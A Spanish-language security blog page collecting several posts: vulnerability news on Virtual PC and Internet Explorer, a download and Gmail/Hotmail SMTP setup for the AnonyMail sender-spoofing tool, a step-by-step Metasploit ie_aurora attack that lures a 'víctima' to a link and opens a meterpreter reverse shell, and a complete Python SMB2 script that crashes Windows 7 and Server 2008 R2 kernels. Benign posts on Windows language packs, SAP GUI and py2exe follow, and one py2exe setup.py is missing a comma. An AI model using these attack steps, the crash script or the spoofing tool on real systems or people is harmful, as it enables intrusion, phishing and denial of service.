Rincón Informático

Un autor de exploits de Core Security Technologies ha descubierto una seria vulnerabilidad que expone a los usuarios del software de virtualización Microsoft Virtual PC a los ataques de hackers maliciosos.

La vulnerabilidad, la cual no tiene parche, esencialmente permite a un atacante eludir varias de la principales mitigaciones de seguridad — Data Execution Prevention (DEP), Safe Exception Handlers (SafeSEH) y Address Space Layout Randomization (ASLR) — para explotar el sistema operativo Windows.

Como resultado, algunas aplicaciones con fallas que no son explotables cuando corren en un sistema operativo no-virtualizado se vuelven explotables su corren dentro de un SO huésped en Virtual PC, según Ivan Arce, Jefe de Tecnología de Core.

La falla, descubierta por el escritor de exploits Nicolás Enonomou, existe en el administrador de memoria del Monitor de Máquina Virtual. Provoca que las páginas de memoria por encima del nivel de 2GB sean accedidas con privilegios de lectura o lectura/escritura por los programas en espacio de usuario en un sistema operativo huésped.

El software afectado incluye Microsoft Virtual PC 2007, Virtual PC 2007 SP1, Windows Virtual PC y Microsoft Virtual Server 2005. En Windows 7 la característica del modo XP también es afectado por la vulnerabilidad.

En particular, una aplicación vulnerable corriendo en Modo Windows XP en Windows 7 puede ser explotable en un ambiente virtual, en tanto la misma aplicación corriendo directamente en un sistema operativo Windows XP SP3 no.

La tecnología Microsoft HyperV no es afectada por este problema.

Fuente

El pasado Martes 9 de Marzo, Microsoft publicó un “Security Advisory (981374)”. La vulnerabilidad es un use-after-free (Referencia no valida a un puntero) la vulnerabilidad se encuentra en Iepeers.dll y sólo afecta a las versiones de Internet Explorer 6 y 7.

Es posible bajo determinadas condiciones para el puntero no válido, tener acceso después de que se haya eliminado un objeto. En un ataque, al tratar de acceder a un objeto liberado Internet Explorer puede permitir la ejecución remota de código.

Si un atacante explota esta vulnerabilidad podría obtener los mismos privilegios del usuario actualmente logueado en el computador. Así que a los usuarios de estas versiones de Internet Explorer se les recomineda que se actualicen a la version más reciente.

Para esta vulnerabilidad ya existe un exploit, la forma en que se puede explotar la vulnerabilidad la puede encontrar en esta PAGINA

Referencias

Microsoft Security Advisory

cve-2010-0806

AnonyMail es una herramienta que ha sido creada por Xa0s de professional-hacker que como su nombre lo indica sirve para enviar Emails anónimos.

La aplicación permite enviar correos electrónicos mediante SMTP, utilizando un email nuestro pero con un correo falso. Es decir, a la persona que le enviemos el email podemos enviárselo con el que nosotros queramos.

Además soporta HTML por lo que podemos enviar mensajes perfectamente utilizando HTML a nuestro gusto.

También se puede adjuntar algún archivo que quieras.

Si quieres enviar un email utilizando un correo de Gmail, en Servidor SMTP debes poner “smtp.gmail.com” y en puerto “465″. Luego tú correo, contraseña y luego llenas los demas datos que te pide que es el email de la persona a quien se lo quieres enviar, el correo falso con que quieres que le llegue el email, asunto, si quieres adjuntar algún archivo y el mensaje para el cual puedes utilizar HTML.

Si quieres enviar un email utilizando un correo Hotmail/Live el Servidor SMTP es “smtp.live.com” y el puerto es “25″.

Pueden enviarlo con el de ustedes o crear un correo nuevo para la ocasión.

Por el momento solo esta para windows.

Descargar:
AnonyMail

La aplicación utiliza Codejock. Si no tienen las dependencias se las dejo.

Codejock

Fuente: Professional-Hacker

Hace pocos días,  Google y otras grandes empresas recibieron un ciberataque denominado “Aurora”  el cual aprovechaba una nueva vulnerabilidad de tipo 0-day en Internet explorer que permite  la ejecución remota de código en las maquinas vulnerables. Cito la noticia:

McAfee Labs ha estado trabajando contra reloj para evaluar cómo se realizó el ciberataque al que han bautizado como Aurora y que afectó tanto a Google como a varias decenas de empresas y a sus servidores de correo. Una de las causas de este ataque ha sido la aparición de una nueva vulnerabilidad Zero Day en Internet Explorer, que se descubrió recientemente gracias a esas tareas de investigación y sobre la que Microsoft ya ha publicado sus propias notas.

Según los estudios de McAfee, los intrusos ganaron accesos a las organizaciones mandando ataques a medida a ciertas personas que se supone que tienen permisos de acceso especiales. La combinación de mensajes que parecían provenir de fuentes de confianza y de la vulnerabilidad en IE puede haber sido la base de dichos ataques, según la firma de seguridad

Observando el impacto que tuvo dicha vulnerabilidad, acá en RinconInformatico.NET quisimos hacer una prueba de concepto (al igual como lo hicimos con una vulnerabilidad de Firefox) para comprobar lo fácil que es la explotacion de este fallo.

¿Que necesitamos?

• Metasploit en su ultima versión ( o actualizarlo)
• Una victima

Antes de empezar es oportuno aclarar que esta prueba fue hecha con un Windows XP SP2  e I6, según otras fuentes el exploit que se encuentra en el metasploit solo es efectivo con IE6, sin embargo, el exploit que pueden encontrar aqui sirve para todas las versiones de Internet explorer.

Y empezamos…

Después de tener nuestro metasploit framework abrimos la consola:

msfconsole

Ahora procedemos a seleccionar el exploit y darle los parámetros adecuados:

use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (nuestra ip)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

Después de lanzar el exploit, debemos decirle a la víctima que acceda al siguiente enlace (LOCAL IP) en este caso es el siguiente:

http://192.168.1.4:8080/

Inmediatamente nuestra víctima abre el enlace malicioso veremos como  el metasploit empieza a trabajar, hasta que nos abre una sesión. El siguiente paso es seleccionar la sesión:

sessions -i 1 // donde 1 es el id de la sesión que se ha creado.

Si todo ha salido bien tendremos  el prompt de meterpreter, desde donde podemos hacer muchas cosas interesantes, como tomar un screenshot del escritorio de la víctima, saber el nombre del equipo con su grupo de trabajo,  o en su defecto tener un shell remota de nuestro equipo víctima. algunos ejemplos:

meterpreter > use espia
meterpreter > screenshot victima1.bmp // el screenshot quedara en tu escritorio

meterpreter> shell // obtendremos una shell donde podemos hacer lo que deseemos.

Consideraciones..

• Con este método, solo es vulnerable ie6
• Un antivirus actualizado detecta el ataque (comprobado con nod32 y mcafee)
• Obviamente si la víctima cierra el internet explorer se caera el ataque.

Por ultimo, no sobra decir que este es un laboratorio informativo, es decir, un  prueba de concepto, el que haga esto no es un hacker. La idea de esta entrada no es ejecutar un exploit, es tratar de entender como es su funcionamiento y la forma de implementarlo.

Muy seguramente alguno de ustedes  fieles lectores han recibido o conocen  alguien que ha recibido una laptop que ha sido mandada desde otro país, los motivos son varios:

• Mas tecnología.
• Menor precio.
• Diversidad de marcas.
• Entre otros…

Uno de los principales inconvenientes con este tipo de laptop’s es el idioma que trae configurado el sistema operativo (generalmente Windows), muchos usuarios pensaran que la única solución a este problema es formatear e instalar una versión en español,  sin embargo existe una aplicacion llamada Windows XP Multilingual User Interface (MUI) la cual nos ayuda a traducir todo nuestro sistema operativo sin formatear ni perder ningún dato. El procedimiento que debes seguir para pasar de ingles a español tu windows, es el siguiente:

1. Debemos prevenir algún error, así que creamos un punto de restauración en nuestro sistema (inicio – todos los programas -  accesorios – herramientas del sistema – restaurar sistema) allí escoges  la opción de crear un punto de restauración y sigues las instrucciones. Esto nos ayudara a que si falla  la traducción del sistema operativo podamos volver a dejar todo como estaba.
2. Descargamos la aplicacion desde aca.
3. Lo descomprimos y ejecutamos el archivo MUISETUP.EXE.
4. Ahora leemos TODA la licencia y respondemos si estamos o no de acuerdo con la misma.



5. En el siguiente pantalla seleccionamos la casilla spanish e indicamos que este sera nuestro idioma predeterminado.



6. Por ultimo damos ok, esperamos a que se instale y reiniciamos.
7. Solo nos queda ir a panel de control- Configuraciones regionales y de idiomas, y seleccionamos el idioma español en TODAS las pestañas.



8. Reiniciamos de nuevo para visualizar los cambios.

Este pack tiene la traducción solamente de ingles a español, sin embargo  para aquellos usuarios que tengan su sistema operativo en otros idiomas les dejo el paquete necesario, solo basta instalarlo de la misma forma que  hemos explicado anteriormente:

• Chino
• Frances
• Aleman
• Koreano
• Portugues
• Ruso
• Turco

Interesante herramienta a escrito Nelson Brito, sirve para identificar versiones de la famosa base de Datos de Microsoft SQL server, es capaz de identificar las versiones de SQL Server 2000, SQL Server 2005 y SQL Server 2008.

Como punto importante se puede resaltar que esta herramienta es sumamente veloz y usa un algoritmo de probabilidad para determinar las versiones del servidor con el motor de bases de datos

Cabe resaltar que esta herramienta es una BETA y la idea es descargarla, probarla y si hay problemas ayudar a identificarlos.

Descargar MSQLFP desde Google Code.

Con la liberación por parte de Microsoft de Windows 7, algunas empresas han pensado migrar sus escritorios de trabajo a este Sistema Operativo.  Sin embargo conozco un par de implementaciones donde se estaba realizando esta operación y tuvieron muchos problemas principalmente por las versiones de sus SAP GUI For Windows, los cuales no funcionaban correctamente en Windows 7.

SAP se encuentra desarrollando el SAPGUI 7.20 For Windows y se suponía que saldría para las mismas fechas del lanzamiento de Windows 7, sin embargo como dichas fechas fueron modificadas por Microsoft, SAP no ha liberado aun su nueva versión de SAP GUI.

Sin embargo para poder ejecutar SAP GUI For Windows en Windows 7 no es necesario tener la versión 7.20, puesto podemos tenerlo, pero con los siguientes aditamentos:

• SAP GUI For Windows 7.10 Core, Nivel de parche 15
• BW 3.5 para SAP GUI 7.10 nivel de parche 8
• BI 7.0 para SAP GUI 7.10 nivel de parche 1001
• KW para SAP GUI 7.10 nivel de parche 6

En RinconInformatico hemos visto un par de parches para SAP GUI y estos serán de mucha ayuda si no saben cómo descargarlos desde el Markplace de SAP.

Cabe anotar como recordatorio que:

• SAP GUI 7.10 solo se mantendrá en vigencia hasta el 2011.
• Solo se soportara Windows 7 en 3 versiones (Professional, Ultimate, Enterprise)
• El soporte de Office 2010 SOLO se tendrá en cuenta para SAP GUI 7.20

Como todos saben, Python es un lenguaje interpretado, sin embargo, hay ocasiones en las cuales es necesario crear un archivo ejecutable  para transportar el script y ejecutarlo sin la necesidad de tener el lenguaje de programación instalado.

Existe una herramienta desarrollada en Python llamada PY2EXE, que nos permite crear un archivo .exe a partir de cualquier script de este mismo lenguaje (Python) en ambientes Windows. En esta oportunidad,  daremos a conocer un ejemplo muy básico sobre el uso de PY2EXE para crear de forma fácil y sencilla un ejecutable .exe basándose en un archivo .py

Requisitos

• Python: Obviamente es necesario tener instalado el lenguaje  de programación, en entornos GNU/Linux ya viene incluido, pero como estamos trabajando con otros ambientes privativos, debemos descargar el instalador desde acá y proceder con la instalación.
• Py2Exe: Descargamos la herramienta que nos facilitara el proceso de la creación del .exe descargar aca
• Es fundamental tener listo el script el cual queremos convertir en .exe

Creando el ejecutable de Python

Teniendo las herramientas necesarias instaladas en nuestro PC procederemos a crear un archivo  .py que lo llamaremos setup en el cual   definiremos las opciones para  nuestro ejecutable, un ejemplo de un archivo setup.py muy basico seria el siguiente:

from distutils.core import setup
import py2exe
setup(console=['script.py'])

Donde script.py es nuestro archivo de python el cual queremos crear en  .exe

Si queremos algo mas personalizado podemos agregar diferentes parámetros a nuestro setup.py por ejemplo:

from distutils.core import setup
import py2exe 

setup(name="nombre aplicacion",
 version="0.0",
 description="Una pequeña descripcion",
 author="autor",
 author_email="email del autor",
 url="url del proyecto",
 license="tipo de licencia",
 scripts=["script.py"],
 console=["script.py"]
)

Con esto nuestro ejecutable se ejecutara en una consola, pero si deseamos que se ejecute en una ventana cambiamos la linea console=["script.py"] por esto:

windows=["script.py"]

Por ultimo  procedemos a  crear el ejecutable, es importante aclarar que  tanto el archivo setup.py y script. py deben estar en la misma ruta. Asumiendo esto, creamos el ejecutable:

1. Abrimos un simbolo del sistema (como llaman a la consola en Windows)
2. Nos ubicamos donde tengamos  los dos archivos .py (si no saben manejar la consola de Windows, en la red hay miles de articulos que ayudan a defenderse un poco en ella)
3. ejecutamos el siguiente comando

python setup.py py2exe

Si todo ha salido bien, tendremos una carpeta  llamada dist donde estara nuestro ejecutable  con todos los archivos necesarios para su ejecucion. ¿Pero que pasaria si quisieramos que todos estor archivos fueran incluidos en el ejecutable .exe, es decir que el resultado sea solo un archivo.exe?

Para hacer esto debemos modificar nuestro archivo setup.py de esta forma:

from distutils.core import setup 
import py2exe 
 
setup(name="nombre aplicacion", 
 version="0.0", 
 description="Una pequeña descripcion", 
 author="autor", 
 author_email="email del autor", 
 url="url del proyecto", 
 license="tipo de licencia", 
 scripts=["script.py"], 
 console=["script.py"] 
 options={"py2exe": {"bundle_files": 1}}, 
 zipfile=None
)

Volvemos hacer el punto 3 y como resultado en nuestra carpeta dist tendremos un solo ejecutable listo para correr el cual incluye todas las dependencias que este necesita.

Pata hacer esto desde GNU/Linux no encontre alguna forma posible  aparte de emular el python y el py2exe con wine, si algun usuario tiene idea de como hacer este proceso en GNU/Linux me gustaria que nos comentara como  es el proceso.

Leyendo los feeds  me encuentro con esta noticia, se trata de un nuevo fallo en el sistema operativo de moda: Windows 7

Este bug permite  a los atacantes  bloquear la maquina victima lo cual  obliga a  reiniciar para tener otra vez control sobre la misma. En la pagina del investigador que dio a conocer el fallo (Laurent Gaffi)  explica  como funciona esta vulnerabilidad la cual se encuentra nuevamente en el protocolo SMB,  y afirma que no es posible la ejecucion de codigo remoto, ya que  el codigo de explotacion afecta al kernel de Windows 7 y Windows Server 2008 R2, disparando un bucle infinito.

Comparto el codigo de explotacion:

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"

class SMB2(SocketServer.BaseRequestHandler):

 def handle(self):

 print "Who:", self.client_address
 print "THANKS SDL"
 input = self.request.recv(1024)
 self.request.send(packet)
 self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Que raro que el protocolo SMB este presentando tantos problemas de seguridad,  ya que anteriormente  se han hecho publicos algunos fallos que afectan este mismo  protocolo como  la vulnerabilidad  BSOD  (pantallazo azul) que afectaba a Windows Vista, Windows 7 y Windows server 2008